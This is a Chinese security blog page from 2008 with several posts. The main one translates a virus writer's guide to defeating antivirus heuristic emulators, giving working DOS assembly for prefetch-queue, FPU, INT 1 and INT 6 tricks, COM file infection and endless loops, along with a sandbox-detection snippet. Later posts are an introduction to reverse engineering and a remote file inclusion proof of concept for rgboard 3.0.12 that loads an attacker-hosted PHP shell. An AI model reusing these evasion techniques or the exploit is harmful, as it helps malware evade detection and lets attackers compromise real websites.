mov ax, 3D02h ;0×3D02 是密钥
add ax, key
int 21h

1 通过指令预取反跟踪技术：

早期的处理器，像386或者486都使用了指令队列预期（PIQ）技术来提高代码执行效率。这一技术的本质是，当CPU将要执行一条指令时，它已经将该指令预先读到了CPU的cache中了。所以在此之前的修改对CPU来说已经没有影响了。让我看一个这样的例子：
mov word ptr cs:[offset piq], 20CDh
piq:
nop
nop

你应该会想到这个程序将结束运行，因为两个字节的nop 指令会被覆盖为 int 20h（译者注：int 20h 是返回DOS的指令）。但在386或486的机器上去并非如此，因为nop指令已经在cpu的cache中了。但在Pentium/Pentium II 体系的机器中运行时，指令则会被覆盖，程序执行后退出。

如果你想利用这一特性来对抗启发式检测技术的话，你就必须知道在386/486年代这是一种广泛的对抗启发式检测的手段。但是随着AVs的改进，他们已经加入了对指令预期技术的支持。这是不是件很不可思议的事情，他们仿真的东西竟是不存于现在的处理器当中的。让我们再看看上面的例子，这是我们用来对付他们的，在 pentium 或者更高级别的处理上面，像我所说的那样，程序会终止，因为这些处理器没有使用PIQ技术。但大部分的AVs会继续让代码执行那两个nops，因为他们要仿真PIQ。所有这块我们这样做：

mov word ptr [offset prefetch], 06C7h
prefetch:
int 20h
dw offset decrypt_key
dw key

int 20h 指令将被覆盖，替换它的将是下面的指令
mov word ptr [decrypt_key], key

基于对PIQ的考虑，AVs将终止程序的执行。但实际上我们的程序将继续运行，在我们的加密处理函数中设置密钥。我们仅存在一个问题，那就是我们的代码要运行在Pentiums或更高级别的处理器上面。为了使之兼容486系列或更低一些处理器，我们只需清除掉PIQ之间的两条指令。

没有什么比这更简单的了！当然，你也要知道清除所有jump类指令（jmp, call, loop, int…）之间的PIQ（这一点是必需的，如果你想这样做的话）。但是我们不能简单的处理JMP Short $+2之间的指令，对于清除PIQ来说它应该是正常被执行的，因为代码仿真器是会察觉到这一点的。

但是我们可以使用一个特殊的功能，CPU的陷阱标志。如果这个标志被置位，那么其后的任何指令执行都将触发int 1 的中断调用，记住这样会清除PIQ。这通常是在的调试状态下，1号中断向量只是简单的 IRET，所以我们可以使用没有任何问题。无论如何，执行后再次清除陷阱标志都是个很好的主意。下面展示的代码可以运行在任何处理器上（assumes DS = CS）。

pushf                                   ;flags on the stack
pop ax                                  ;flags from stack into AX
or ax, 100000000b                       ;set trap flag
push ax                                 ;put the modified flags in AX back…
popf                                    ;into the flag register via the stack

mov word ptr [offset prefetch], 06C7h   ;modify the following instruction
prefetch:                               ;here gets int1 called => clears PIQ
int 20h                                 ;This is never executed
dw offset decrypt_key                   ;where we want to write our key to
dw key                                  ;the actual decryption key

pushf                                   ;clear the trap flag again with
pop ax                                  ;the same method as above.
xor ax, 100000000b                      ;will also fool some debuggers
push ax
popf

mov word ptr [offset prefetch], 20CDh ;restore the int20h (next generations)
这种方式可以骗过 AVP, Dr. Web, f-prot v3.04 (even with the /PARANOID flag),但不能通过f-prot v2.27, Nod, Ikarus and Dr. Solomon’s. f-prot v2.27 and Ikarus的检测。另一方面我们也可以欺骗”正常的“使用PIQ手段（当然你要记得，这并不能运行于现在的处理器上）。

2 通过FPU 的手段：

我非常喜欢用欺骗方式，因为相对于大多数的有效手段来说，这种方式是非常简单。它可以愚弄*ALL*所有的扫描器。你仅需要考虑的一件事情就是启发式扫描器不能仿真浮点指令。很明显，AVs考虑的是病毒程序运行是不需要FPU指令的。好了，让我们证明他们的想法是错误的。我们将要做的是，在加密完成后，通过浮点数来转换密钥，解密时再将它转换成整数。

; AFTER ENCRYPTION:
mov decrypt_key, key                    ;save key into integer variable
fild decrypt_key                        ;load integer key into FPU and store
fstp decrypt_float_key                  ;it back as floating point number
mov decrypt_key, 0                      ;destroy the key (very important!)

; BEFORE DECRYPTION:
fld decrypt_float_key ;load the key as floating point number

正向我前面所说的，这一手段非常容易且极端有效，但如果你使用它，也要考虑到运行系统的要求。如果你的virus运行在没有FPU的系统上时，他将崩溃。

3 通过INT 1 的手段：

前文已经提到，如果CPU的陷阱标志被设置，那么任何指令执行后，int 1 中断都会被调用。我也可以通过手工的调用的int 1 中断来达到我们的目的。int 1中断的反汇编代码通常是0CDh/001h,自从有了一个专用opcode来表示int1（0F1h）中断后，这样反而是非常奇怪的，尽管这是未公开文档化的。但是”not documented”的意思也应该是”not emulated by AVs”, ^_^ 。所有我们将这样做：我们设置一个我们自己的INT 1 中断的handler，同时调用”not doumented“ 的opcode 0F1h，返回解密密钥。AVs 将没有办法知道解密密钥是什么。

mov ax, 3501h ;get int vector 1, so we can restore it later
int 21h ;not really necessary, but a little bit saver
mov int1_segm, es
mov int1_offs, bx

mov ax, 2501h ;set int vector 1 to our own routine
mov dx, offset int1_handler ;we assume DS=CS
int 21h

db 0F1h ;this will call our int 1 handler, which
mov decrypt_key, ax ;returns the decryption key

mov ax, 2501h ;restore the original int 1 handler
mov dx, cs:int1_offs
mov ds, cs:int1_segm
int 21h

[...]

int1_handler:
mov ax, key
iret

另外一件好笑的事是，我们可以伪造程序退出，可以这样做：
[...]

db 0F1h                         ;calls our int 1 handler (see above);
mov ax, 4c00h                   ;quit program
int 21h                         ;but… this code is never reached…

[...]

int1_handler:
mov bx, sp ;modify return address, so the quit command
add word ptr ss:[bx], 5 ;is never executed.
iret

这是非常有效的一种手段，在我的测试中仅F-PORT v2.27 /PARANOID 能检测出了它，尽管它只能运行在intel的CPU上。在Cyrix 或者 AMD 处理器上是不能使用这中方法的。因此你virus如果运行则将崩溃。:- （如果你想看一下的病毒情况，你可以查找我写 PR.H！ virus）

4 通过INT 6 的手段：

cpu 如果发现无效指令运行则int 6h 中断总是会被调用的。这个方法非常相似于INT 1 中断的手段。我们设置一个INT 6h中断的handler，然后执行一个条我们故意使用的无效指令，同时返回解密密钥。如果我们不想陷入无穷尽的循环当中，就要修改返回时的偏移。
mov ax, 3506h ;get int vector 6, so we can restore it later
int 21h ;not really necessary, but a little bit saver
mov int6_segm, es
mov int6_offs, bx

mov ax, 2506h ;set int vector 6 to our own routine
mov dx, offset int6_handler
int 21h

dw 0FFFFh ;an invalid opcode, will call our int 6
mov decrypt_key, ax ;handler, which returns the decryption key

mov ax, 2506h ;restore the original int 6 handler
mov dx, cs:int6_offs
mov ds, cs:int6_segm
int 21h

[...]

int6_handler:
mov ax, key
mov bx, sp
add word ptr ss:[bx], 2 ;modify return address - very important!
;2 is the size of our invalid opcode.
iret

请记住，这一方式并不能工作在window系统下的dos窗口程序中，因为window会率先截获一个无效的opcode，并给出错误消息(thanks to Z0MBiE for that tip)。所以如果你想使你的DOS virus兼容window，那么不要用此方法，尽管破坏引导区的virus实在是很美妙的。

5 感染COM文件及FAR JUMP方式：

我不喜欢delta offsets方式，所有我开始尝试用far jump方式来感染com文件（当然，还是要加上些代码用来重定位的）：

mov ax, cs                      ;Relocate far Jump
add [offset com_seg], ax
JMP SHORT $+2                   ;Clear prefetch queue
db 0EAh                         ;OP-Code far Jump
dw offset start                 ;Offset
com_seg dw 0                    ;Segment (length of com file in paragraphs)
;pad filesize to even paragraph!

这段代码可以非常稳定地运行，我很惊讶，这种感染方式可以阻止AVP和Tbscan的来发现文件已被感染的检测方式。如果想看全部的virus欺骗技巧，再一次提醒您，可以查找我写 PR.H！- virus。

6 初始化寄存器方式：

大多是DOS版本的系统，在程序开始时的寄存器值是下面这样的：

AX=BX=0000h (if the first/second command line parameter contain a illegal
drive letter, AL/AH are set to 0FFh)
CX=00FFh
DX=DS=ES=PSP segment address
SI=IP
DI=SP
BP=91Ch/912h depending on DOS/Windows version.

如果你知道这些，你就可以利用这些值来加密你的virus了—- 一些AVs并不能正确的仿真这些值，因为这些大部分是undocumented。例如，我是用91h（BP shr 4）来加密/解密我的病毒体，可以非常好的欺骗TBAV, DrWeb, f-prot v2.27 and Ikarus这些AVs,但是不能很好的对抗AVP和NOD。

当然除了BP你还可选择其它寄存器来做这样的事情，保存加密密钥到指向EXE头部的堆栈处指针。例如，设置正确的堆栈在程序开始或解密代码处使用DI，或者在加密/解密处使用cx做异或操作。这些可激发你足够的想象力。但请记住，这些undocumented的技巧并在所有dos版下都一样。例如，freedos则在程序开始时设置所有通用寄存器都为0值。如果你想使用这一技巧，就要有心里准备，你的virus崩溃在这些系统的环境中了。

因此你必选结合起来其它的欺骗方式来对抗所有AVs，正如我刚才所说的，它们不是非常强大，基于这个理由，我并不是非常喜欢这种欺骗方式，但无论如何都要感谢bfr0vrfl0为这一方式所创造的灵感。

7 ENDLESS LOOPS：

这是个很古老的手段了。它不同于这篇文章中介绍的其它技术，但当我测试时才惊讶的发现，它非常的棒，可以骗过Thunderbyte, Dr. Web and Ikarus。这一想法的出发点是，那些启发式的扫描器，仅仿真了最开始处的一些指令，然后停止，以此加快扫描速度。因此，我们可以在病毒体开始处设置一个很长的循环，下面是一经典的模式：

mov cx, 0FFFFh
loop_head:
jmp short over_it
mov ax, 4C00h ;actually this isn’t needet, but it’s the
int 21h ;”classic” implementation of this trick.
over_it:
loop loop_head

你还可以使用不同类型的循环，或者像Opic’s Odessa-B virus那样的手法，非常长的一个解密循环。

这篇文章所公布的这些anti heuristic 技术目前为止都可以正常运行。当然AVs也可能改进它们的一些不足，在未来使这些方式失效。随时欢迎把这些技巧加入到你virus当中。使它们作为AVs 无法检测出的地狱，展示给那些愚蠢的AV看他们所谓的”保护“。（译完）

可以看出此篇文章的作者对AV产品中，初期的启发式技术研究的非常深入，目标明确，知晓启发式检测的很多弱点。怎奈时代变换，多态变形病毒已经产量稀少，启发式技术整体上进步缓慢。上面提及的技术虽然已经不能造成多大危害，但基于代码仿真的启发式检测仍有很多个方面会受到技术上的挑战。

1 利用SEH方式：

虽然启发式的仿真器会模拟SEH异常处理，但解决这一对抗性问题却并非像实现一个SEH识别器那样简单。比如virus在解密的过程中洒下随机代码，建立异常处理，随后迫使处理器出错，进入virus的异常处理函数，进而再跳向另一个解密引擎中执行代码。如果AV不能处理这样的异常，病毒的代码也就无从执行，那么和谈检测呢。最大的问题就是仿真环境无法完美的处理某条指令引发的引发的特定异常。

2 慢随机执行方式：

可以利用任何程序开始执行时的随机数据来决定是否进行解密及感染，随机时间也好，日期也好都行，或者像win95下利用FS:[0ch]指向的TIB数据（在win 9x下该处数据随机）。目的只有一个，即便被模拟运行，也无法使AV得到100%的检测率，这也是我以前曾提到过的，仿真器应该具有指令预分析的功能。

3 利用多线程：

多线程的模拟并非高不可攀，关键的难点在于线程间的同步。这一点上没什么可说，仍然是AV今后要努力解决的问题。

4 RDA 方式：

病毒体解密代码可以不知道加密时的密钥，而是通过RDA（随机解密算法）方式来获得，目的只有一个，真实环境下解密部分可以很快运行完，但仿真环境下却会很慢，暴力搜索密钥算法，可能会产生很多个大循环，以此来迫使仿真器退出执行环境。

5 EOP 方式：
仿真器不会很有耐心地执行完程序的每一条指令，只要你的病毒所在宿主程序入口点足够的靠后，那你就胜利了一半，仿真器会因失去耐心而丢下你不管的。此时我想到了ExitProcess，聪明的你肯定明白了接下来将要干什么了，当然，当你知道这样做的时候，AV已经开始行动了，但关键是我们已经找到了一种对抗的思路了。

6 分析执行逻辑方式：
这一点是从xyzreg那里学到的，考虑到程序真实的运行与仿真环境的差别，也就知道如何对抗了。指令预取反跟踪也属于这一思路的范畴。下面是xyzreg给出的代码：

DWORD fpid,epid;
void VMM()
{
PROCESSENTRY32 pe;
HANDLE hkz=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
pe.dwSize=sizeof(PROCESSENTRY32);
if (Process32First(hkz,&pe))
{
do
{
if (pe.th32ProcessID==GetCurrentProcessId())
{
fpid=pe.th32ParentProcessID;
}

if (stricmp(pe.szExeFile,”explorer.exe”)==0)
{
epid=pe.th32ProcessID;
}
}
while(Process32Next(hkz,&pe));
}
}
void main()
{
if(fpid!=epid)
return 0;
}
即便是一向作风严谨AVP也会有此疏漏，且在仿真的执行环境中与正常执行相悖的逻辑还有很多处，如GetModuleFileName。所以仿真的启发式检测远没有达到十分完善的地步。

还有一些对抗技巧如利用MMX指令或利用API传递控制等，但因这些技巧本身不会对启发式检测构成绝对威胁此处不再一一举例。启发是虽是对抗 virus的利器，但我更感觉越是复杂高级的检测技术反而越加脆弱，脆弱的原因就是太过于复杂，所谓智者千虑必有一失吧。在没有加密、多态病毒出现前，特征匹配技术对待病毒可谓一剑封喉。或许越是简单的技术越是无懈可击。一次偶然间发现NOD可以仅用高级侦测模式，检测出被感染的文件，并精确的给出病毒名。或许启发式检测加适量的特征应该是对抗virus的最好武器吧。

附参考文献:
[1] Black Jack . 《Anti heuristic techniques》原文出处 http://vx.netlux.org/lib/vbj01.html
[2] Peter Szor . 《The Art of Computer Virus Research and Defense 》
[3] xyzreg. 《可怜的高级虚拟机启发式查毒》www.xyzreg.net/blog/read.php?39

评论数量(0) | 发表评论 | 分类：技术文章
本文网址：http://huaidan.org/archives/1961.html

代码逆向乱谈之导引

鬼仔 — Thu, 08 May 2008 12:52:14 +0800

作者：xikug (xikug_at_163.com)
来源：安全焦点

序

早就想写点什么，自己都不知道一天在瞎忙什么，一直到最近才开始动手。。。我想通过这个乱谈系列跟大家分享一些心得。我打算在这个系列文章中讲点方法与思路，当然，很多方法并不是我的原创，只是我用这些方法和思路解决了我的实际问题。由于本人水平有限，很多说法只是我个人的理解，然后用我自己的语言表达出来，可能并不专业，所以在这里不负责任的乱谈一下，欢迎大家拍砖。
什么是代码逆向

代码逆向即是在没有源代码的情况下，对目标程序的行为、数据流、及编译器生成的代码进行分析，通过分析我们可以了解、发现程序的功能、流程、规则、及技术实现细节等，通过分析我们能对其进行优化、功能增强、漏洞填补、甚至还原成源代码等。这个分析过程我们可以称作逆向分析或逆向工程，简称逆向。

对我们个人而言或许我们能够从逆向分析的过程得到的最大好处就是学习到优秀程序的设计思想、及技术实现细节。

当今，逆向分析技术在很多地方都得到了应用，典型应用包括恶意软件分析、漏洞挖掘、BUG定位、技术探秘等。

有人可能会说逆向太无耻了，自己不会写就偷别人的代码。。。我就不相信说这话的人什么都会，我就不信他没有分析过别人的东西，学习过别人的东西，我只能说他是无知的。。。殊不知逆向是一个探索未知的方法，是一种学习态度，是代表不屈服于困难的精神。如果没有逆向当前的很多科学进步不了这么快，也可能不能取得进步，科学研究就是探索未知，把我们未知的东西进行分析研究变成已知，不光是软件领域有逆向工程的应用，其他领域如：基因重组、化工、制药、电子、建筑、航空、军事等领域也存在着他们各自的逆向工程应用，逆向工程帮助科研人员把未知的东西进行分解、研究、组合、改进等，甚至创造新的东西出来等，科学就是这样一点点进步的。

通过逆向得到的好处是显而易见的，然而任何技术都是把双刃剑，逆向分析技术也不例外。可能被人用于学习、解决技术问题或做有益于软件安全的事，也可能被人用于搞破坏。

逆向方法

白盒分析
白盒分析就是从代码级别上(可能是反汇编代码、反编译的伪代码或源代码)，通过动态调试或静态反汇编分析和理解程序的功能、逻辑，找到程序的安全问题等。

黑盒分析
黑盒分析是指从程序的外部，通过观察程序运行时候的行为，规则等来猜测和断定程序可能的实现方法，是否有存在脆弱点等。

灰盒分析
灰盒分析通常需要借助一些专有工具(可能需要自己编写)，如api监视工具，陷阱工具，内存比较工具，文件监视工具等对目标程序进行监控，看它发生了什么操作，调用了哪些api，产生了哪些结果，在系统哪些地方安插了HOOK或过滤等，以此来猜测和断定程序可能的实现细节。

目前越来越多的程序加了VM或进行了代码扭曲，用白盒分析此类程序可能会花很大力气也找不到突破口，而黑盒和灰盒分析往往对这类程序可能有意想不到的效果。

逆向手段

动态调试
通过调试器对目标程序进行追踪分析，能够清楚的了解到程序运行起来后内部的状态，运算结果等信息。

静态反汇编/反编译分析
使用反汇编器或反编译器把目标程序变为可读的汇编代码或伪代码，然后分析程序的结构，流程，逻辑等。

如何学习

逆向并不是想像中那么难，但也不是想像中的那么简单，真正困难的是如何有效的运行这些方法和手段来更快、更好的达到我们的目的，这需要累积大量的程序设计经验和逆向经验。

通常我们进行逆向的时候希望达到的目的大致可分为以下几种：

技术探秘/代码还原

软件漏洞挖掘

软件Bug定位

软件行为/规则分析

解除软件的使用限制

进行辅助程序的开发

我们要达到的目的不同，逆向时采用的方法和手段的“细腻”程度也不会相同，譬如我们对一个win32平台下的内核驱动进行“技术探秘/代码还原”的时候可能会把白盒、黑盒和灰盒所有的方法和手段都用上，每段汇编代码我们都必须看懂，代码实现了什么功能，跟另一段代码有什么关系，理解整个代码的架构和思想等；而我们在进行“软件行为/规则分析”的时候可能只需用上黑盒或灰盒分析法就够了，知道按下这个按钮后读写了哪些文件，哪些注册表项，调用了哪些api 等等。分析过程中有时候我们只需静态反汇编看一下就可以了，有时候我们可能还需要动态调试一下，总之没有固定的套路，一切视情况而定。

扎实的编程基础是学好逆向的关键，基础打好了学什么都快。程序的基础就是算法和数据结构，语言只是一个实现的工具，绝大多数语言都是相通的，我们只要掌握一门，以后如果需要学习其他语言的话上手就会很快了，基础知识我们重点需要掌握以下内容：

１．至少一门高级程序设计语言，推荐C语言或Pascal
２．x86汇编语言
３．常用算法和数据结构

软件一般都是在特定平台下运行的，如Windows平台，Linux平台，WinCE平台，Java平台，Symbian平台，Plam平台等等。。。针对特定平台下的软件逆向，需要掌握特定平台下程序设计的相关知识，包括其SDK，进程管理，内存管理，文件系统等。这些东西不必全部精通，但要有个大致的了解，常用Api要知道，有特定平台下的程序设计经验最佳，遇到问题知道在哪里能找到自己想要的资料就够了。逆向的过程本身就是一个学习的过程，因此我们可以在逆向的过程中补充自己相关的知识，这样学习的效果是最佳的。(由于本人所接触的面比较窄，接触得最多的就是x86 Windows平台下的原生程序逆向，因此本系列文章中的内容除非特别说明都是指x86的Windows平台下原生程序和代码)

学习逆向的最好方式就是动手实践，在实践中有针对性的学习。通常来说我们逆向时所面临的东西对我们来说是未知的或者是可能知道但不确定的，如果是已知的就没必要再去逆向了。针对性的学习就是在自己逆向的时候缺什么知识就补什么知识，日积月累过后我们的收获是相当可观的，不光是经验值的增长，还有知识面的增长和知识深度的增长。

编程的经验对于我们实践逆向时也很重要，例如进行“漏洞挖掘”的时候我们可能会以程序设计者的角色进行思考，程序在哪些地方需要进行防范，哪些地方可能会出现漏洞等等，如果我们有足够的经验的话，可以很快定位到相关的代码部分对其进行分析，看是否存在可能的漏洞。又如在进行“技术探秘/代码还原”的时候，由于现在的程序规模越来越大，我们不可能每条指令，每段代码都去看，都去逆向，假如一个１M的程序需要这样做的话，光时间成本上来说成本都是相当高的，因此我们需要快速定位关键代码段，而丰富的编程经验有助于我们做到这一点。拓宽自己的编程知识面、积累编程经验跟积累逆向经验同样重要。丰富的编程经验能让我们事半功倍。

另外在进行代码还原时我们最好能用原始程序的实现语言进行还原，这是为了避免麻烦，因为现代的编程语言通常都有自己的Framework，提供各种各样的类库，他们功能各异，互不兼容，如一个VCL的程序我们硬要用MFC对其还原，VCL的某一非常复杂的机制或功能在MFC中可能没有，而自己如果在MFC 中实现的话工作量是相当庞大的，这时的结果可能就会是事倍功半了。因此我建议在代码还原时最好使用原语言进行，原来是C的就用C，原来是Delphi的就用Delphi，原来是Python的就用Python。。。

逆向工程时常具有“四两拔千斤”的功效，我也不太会表述，等你有足够的实践之后大概才能体会到，这个就只能意会不能言传了:P。

学习资源
上面说了那么多，是时候介绍一些学习资源的时候了，这些资源都是比较基本的，可说是学习阶段必备的，希望在大家学习和实践的过程中能帮到大家。

书
《Windows程序设计(第５版)》 – Windows平台下程序设计的经验教程。URL - http://www.china-pub.com/2382

《Windows核心编程》 – 又是一本经验的书，可以帮助你把Windows下的编程技术提升一个层次。 URL - http://www.china-pub.com/131

《深入解析Windows操作系统(第４版)》 – 这本书是关于Windows内部机理核心的权威之作。这本书对提高你的逆向水平也是大大有帮助的，当然，前提是在你看懂之后。 URL - http://www.china-pub.com/32775

《加密与解密》 – 不错的入门书籍，快出第三版了，http://www.china-pub.com/12210

网站
www.rootkit.com – 很多关于系统安全，系统内核方面的资料和代码
www.codeproject.com – 很多程序设计的代码和文章
msdn.microsoft.com – 包含最新的微软平台下的开发资料

论坛
bbs.pediy.com - 看雪论坛，国内最大的加解密论坛，已经向软件安全转型，上面汇集了国内大批高手。
www.unpack.cn - 一蓑烟雨，国内最专业的脱壳论坛，关注面也很广，除了脱壳外还有汉化、软件安全、木马病毒、编程、游戏、文学、音乐、艺术等，上面的高手也不少。
bbs.driverdevelop.com - 驱网论坛，驱动开发的论坛，高手不少，但是发言的比较少，可以去逛逛。
forum.sysinternals.com – Sysinternals，很多系统方面的资料，不少高手在上面发言。
www.debugman.com - 第8个男人，在下创建的论坛，旨在为志趣相投的朋友提供一个交流平台，目前关注方向为程序设计、逆向、代码安全和系统底层等。

工具
这里列出的工具只是很少一部分，对工具的选用，我的观点是哪个随手就用哪个。
OllyDbg – 调试器，ring3下的调试器，上手快，功能强大，有很多插件。
SoftIce – 调试器，ring0级调试器，当然ring3程序也是可以调的，功能强大，但已经不更新了，不支持vista等较新的操作系统。
WinDbg – 调试器，MS自家的调试器，就不多介绍了，两个字 - 推荐。
IDA – 反汇编器，最强大的静态反汇编分析工具。
LordPE – PE工具，可编辑PE文件等。
PEiD – PE工具，可识别PE文件的格式信息，如用什么编译器编译的，是不是被什么壳处理过了等。
FileMon – 文件监视工具，可监视系统或程序对哪些文件做了什么操作。
RegMon – 注册表监视工具，可监视系统或程序对哪些注册表项做了什么操作。
SSM – HIPS，这个工具有时候可以给逆向带来很多方便，如抓取某个文件，禁止访问某个注册表项，盒灰分析等。

评论数量(0) | 发表评论 | 分类：技术文章
本文网址：http://huaidan.org/archives/1960.html

刚发现评论系统出了问题

鬼仔 — Wed, 07 May 2008 18:19:57 +0800

这几天一直没有看到大家发评论，结果刚才检查了下发现评论出了问题，赶紧修复了下，现在没问题了，大家可以继续板凳、沙发了，嘿嘿。

评论数量(9) | 发表评论 | 分类：心情随笔
本文网址：http://huaidan.org/archives/1959.html

rgboard 3.0.12 远程文件包含漏洞

鬼仔 — Wed, 07 May 2008 17:17:03 +0800

鬼仔：昨天有事出去了下，家里宽带到期了，我竟然不知道，晚上回来之后才发现的，今天去交了费，所以更新没跟上。

Infos: rgboard 3.0.12 远程文件包含漏洞
Author: Flyh4t[w.s.t]

rgboard 3.0.12 是韩国的一个论坛程序,可以用google搜索rgboard查看使用的网站
vul code:
\include\bbs.lib.inc.php：
if (!defined(’BBS_LIB_INC_INCLUDED’)) {
define(’BBS_LIB_INC_INCLUDED’, 1);
// *– BBS_LIB_INC_INCLUDED START –*
if(!$site_path) $site_path=’./’;
require_once “{$site_path}include/lib.inc.php”;
//$site_path没有过滤直接放过来包含了
poc:
在你的网站放个phpshell,目录和文件名为/include/lib.inc.php
然后访问
httP://www.target.com/include/bbs.lib.inc.php?site_path=http://yousite/

评论数量(0) | 发表评论 | 分类：工具收集
本文网址：http://huaidan.org/archives/1958.html

鬼仔's Blog

SSClone非ARP会话劫持原理分析

相关日志

使用winpcap定制TCP包发送

相关日志

我以前用的LBS提供下载

相关日志

NtGodMode.exe

相关日志

php escapeshellcmd多字节编码漏洞解析及延伸

相关日志

对抗启发式代码仿真检测技术分析

相关日志

代码逆向乱谈之导引

相关日志

刚发现评论系统出了问题

相关日志

rgboard 3.0.12 远程文件包含漏洞

相关日志